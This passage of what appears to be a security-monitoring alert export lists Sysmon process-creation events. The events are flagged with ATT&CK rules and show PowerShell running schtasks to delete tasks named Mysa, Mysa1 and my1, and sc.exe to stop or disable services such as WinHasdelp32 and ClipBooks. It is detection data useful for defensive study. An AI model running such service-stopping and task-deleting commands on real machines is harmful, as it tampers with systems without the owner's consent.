2020-05-28 12:50:03.548\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-001016631e00}\r\nProcessId: 7116\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.548"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-001016631e00}"",""processId"":""7116"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.774",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.475 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010ff601e00} +ProcessId: 7660 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.513725700Z"",""eventRecordID"":""2471"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.475\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010ff601e00}\r\nProcessId: 7660\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.475"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010ff601e00}"",""processId"":""7660"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.761",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.417 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010b65e1e00} +ProcessId: 3880 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN my1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.426597600Z"",""eventRecordID"":""2470"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.417\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010b65e1e00}\r\nProcessId: 3880\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.417"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010b65e1e00}"",""processId"":""3880"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN my1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.591",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.375 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010fd5c1e00} +ProcessId: 6880 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ClipBooks +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.379550200Z"",""eventRecordID"":""2468"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.375\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010fd5c1e00}\r\nProcessId: 6880\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.375"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010fd5c1e00}"",""processId"":""6880"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ClipBooks"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.542",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.267 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010305a1e00} +ProcessId: 7636 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.276869200Z"",""eventRecordID"":""2465"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.267\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010305a1e00}\r\nProcessId: 7636\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.267"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010305a1e00}"",""processId"":""7636"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.526",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.209 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010fe581e00} +ProcessId: 2056 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinHasdelp32 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHasdelp32 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.212043600Z"",""eventRecordID"":""2464"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.209\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010fe581e00}\r\nProcessId: 2056\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHasdelp32 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.209"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010fe581e00}"",""processId"":""2056"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHasdelp32 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.492",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.175 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010bc561e00} +ProcessId: 6660 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdadelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.177655300Z"",""eventRecordID"":""2462"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.175\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010bc561e00}\r\nProcessId: 6660\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 